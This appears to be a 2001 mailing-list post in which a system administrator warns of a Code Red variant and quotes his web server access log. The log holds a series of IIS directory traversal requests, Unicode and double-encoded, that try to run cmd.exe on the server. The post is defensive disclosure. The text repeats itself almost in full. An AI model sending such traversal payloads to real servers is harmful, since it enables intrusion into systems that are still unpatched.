there is a new variation of the Code Red that is attempting to exploit every
variation of NT/2000 vulnerability... well not EVERY but all the usual
suspects including those opened up by codered2.
[18/Sep/2001:10:03:29 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
310[18/Sep/2001:10:03:30 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
[18/Sep/2001:10:03:30 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
[18/Sep/2001:10:03:30 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
[18/Sep/2001:10:03:30 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
[18/Sep/2001:10:03:30 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
[18/Sep/2001:10:03:30 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
[18/Sep/2001:10:03:31 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
above is a sample of my access log (fortunately NO NT/IIS at my borders).
I've excluded the IP addresses of the attacker and BLACKHOLED them at my
Router to minimize the traffic. This is going to be a rough one!
E. Lee Ingalls III
Commercial Tool & Die Inc.
(p)616.785.8100 (f)616.785.8120
lee.ingalls@...
Fortitudine Vincimus: "by Endurance we conquer."
E. Lee Ingalls III
Commercial Tool & Die Inc.
(p)616.785.8100 (f)616.785.8120
lee.ingalls@...
Fortitudine Vincimus: “by Endurance we conquer.”
variation of NT/2000 vulnerability... well not EVERY but all the usual
suspects including those opened up by codered2.
[18/Sep/2001:10:03:29 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
310[18/Sep/2001:10:03:30 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
[18/Sep/2001:10:03:30 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
[18/Sep/2001:10:03:30 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
[18/Sep/2001:10:03:30 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
[18/Sep/2001:10:03:30 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
[18/Sep/2001:10:03:30 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
[18/Sep/2001:10:03:31 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
above is a sample of my access log (fortunately NO NT/IIS at my borders).
I've excluded the IP addresses of the attacker and BLACKHOLED them at my
Router to minimize the traffic. This is going to be a rough one!
E. Lee Ingalls III
Commercial Tool & Die Inc.
(p)616.785.8100 (f)616.785.8120
lee.ingalls@...
Fortitudine Vincimus: "by Endurance we conquer."
E. Lee Ingalls III
Commercial Tool & Die Inc.
(p)616.785.8100 (f)616.785.8120
lee.ingalls@...
Fortitudine Vincimus: “by Endurance we conquer.”